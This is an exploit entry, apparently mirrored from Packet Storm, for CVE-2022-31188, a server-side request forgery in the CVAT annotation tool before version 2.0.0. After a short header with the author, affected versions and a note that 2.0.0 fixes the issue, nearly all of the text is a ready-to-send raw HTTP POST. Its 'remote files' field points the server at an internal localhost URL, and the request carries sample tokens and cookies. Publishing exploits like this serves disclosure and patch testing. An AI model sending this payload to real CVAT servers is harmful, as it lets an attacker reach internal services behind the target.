Share
## https://sploitus.com/exploit?id=PACKETSTORM:169814
#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)  
#Exploit Author: Emir Polat  
#Vendor Homepage: https://github.com/opencv/cvat  
#Version: < 2.0.0  
#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)  
#CVE: CVE-2022-31188  
  
# Description:  
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.   
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.  
  
POST /api/v1/tasks/2/data HTTP/1.1  
Host: localhost:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0  
Accept: application/json, text/plain, */*  
Accept-Language:en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7  
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV  
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436  
Content-Length: 569  
Origin: http://localhost:8080  
Connection: close  
Referer:http://localhost:8080/tasks/create  
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------251652214142138553464236533436  
Content-Disposition: form-data; name="remote files[0]"  
  
http://localhost:8081  
-----------------------------251652214142138553464236533436  
Content-Disposition: form-data; name=" image quality"  
  
170  
-----------------------------251652214142138553464236533436  
Content-Disposition: form-data; name="use zip chunks"  
  
true  
-----------------------------251652214142138553464236533436  
Content-Disposition: form-data; name="use cache"  
  
true  
-----------------------------251652214142138553464236533436--